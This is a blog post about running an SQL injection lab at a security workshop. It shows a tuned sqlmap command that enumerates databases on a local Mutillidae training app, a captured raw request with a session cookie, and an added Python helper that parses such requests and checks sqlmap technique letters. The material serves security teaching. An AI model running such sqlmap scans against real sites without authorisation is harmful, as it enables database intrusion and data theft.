Two weeks ago I ran a Web Application Security workshop in Thimphu, Bhutan (in collaboration with BtCIRT).

For the SQL injection lab, I found that sqlmap took quite a long time to scan the Mutillidae database. It turns out the default value of the --technique parameter needs a small change. The default is BEUST:

  • B: Boolean-based blind SQL injection

  • E: Error-based SQL injection

  • U: UNION query SQL injection

  • S: Stacked queries SQL injection

  • T: Time-based blind SQL injection

The command below uses BEUS, i.e. it drops T (time-based blind), whose deliberate delays are what make the default scan slow:

    sqlmap -r request.txt -p username --dbms=mysql -o --threads=10 --technique=BEUS --dbs

Note: request.txt contains the URL and the SQL-injectable parameter; it can be captured with ZAP proxy.

    GET http://localhost/mutillidae/index.php?page=user-info.php&username=test&password=test&user-info-php-submit-button=View+Account+Details HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Referer: http://localhost/mutillidae/index.php?page=user-info.php
    Connection: keep-alive
    Cookie: showhints=1; PHPSESSID=r8mv7ultidjmnndr25al8mqosi
    Upgrade-Insecure-Requests: 1
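As an added example (my own code, not part of the original post or of sqlmap), here is a small parser for the raw request file that the -r option reads. It lists the GET, POST and Cookie parameters sqlmap could choose from, which is useful for checking that the name given to -p (here username) actually exists, and it validates a --technique string against the letters BEUST. The request text is a constructed, shortened copy of the request.txt above.

```python
from urllib.parse import urlsplit, parse_qsl

# Constructed sample modelled on the request.txt in the post (CRLF line endings, as captured).
REQUEST_TXT = (
    "GET /mutillidae/index.php?page=user-info.php&username=test&password=test"
    "&user-info-php-submit-button=View+Account+Details HTTP/1.1\r\n"
    "Host: localhost\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "Cookie: showhints=1; PHPSESSID=r8mv7ultidjmnndr25al8mqosi\r\n"
    "\r\n"
)

VALID_TECHNIQUES = set("BEUST")  # sqlmap's default --technique value


def parse_raw_request(raw):
    """Split a raw HTTP request into request line, headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "version": version,
            "headers": headers, "body": body}


def candidate_parameters(req):
    """Return {location: [parameter names]} that a tool like sqlmap could test."""
    params = {}
    query = urlsplit(req["target"]).query
    params["GET"] = [k for k, _ in parse_qsl(query, keep_blank_values=True)]
    if req["body"]:
        params["POST"] = [k for k, _ in parse_qsl(req["body"], keep_blank_values=True)]
    cookie = req["headers"].get("cookie", "")
    params["Cookie"] = [c.split("=", 1)[0].strip() for c in cookie.split(";") if c.strip()]
    return params


def has_parameter(params, name):
    """True if the -p target name appears in any location of the request."""
    return any(name in names for names in params.values())


def check_technique(spec):
    """Validate a --technique string (e.g. BEUS); return its letters or raise."""
    letters = set(spec.upper())
    unknown = letters - VALID_TECHNIQUES
    if unknown:
        raise ValueError("unknown technique letter(s): " + "".join(sorted(unknown)))
    return letters
```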